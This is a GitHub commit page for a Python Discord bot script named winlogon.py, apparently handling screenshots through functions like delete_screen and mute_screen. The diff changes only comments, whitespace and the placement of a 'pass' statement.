Skip to content

Commit 3dc1323

Browse files
authoredDec 25, 2020
Update winlogon.py
1 parent 25294e2 commit 3dc1323

File tree

1 file changed

+4
-3
lines changed

1 file changed

+4
-3
lines changed
 

‎src/main/python/winlogon.py

+4-3
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,7 @@
88
from re import split, findall
99

1010
from datetime import datetime
11-
# import time as time_class
11+
# import time
1212

1313
from discord.ext import commands
1414
from discord import Game, Embed
@@ -120,8 +120,9 @@ async def delete_screen():
120120
await asyncio.sleep(0.5)
121121
# print("I couldn't delete screen!")
122122
else:
123-
pass
124123
# print("exist - " + str(File.exist("screen.png")))
124+
pass
125+
125126

126127
@staticmethod
127128
async def mute_screen():
@@ -1456,4 +1457,4 @@ async def on_message(message):
14561457
print("Ошибка")
14571458

14581459

1459-
client.run(token)
1460+
client.run(token)

0 commit comments

Comments
 (0)
Please sign in to comment.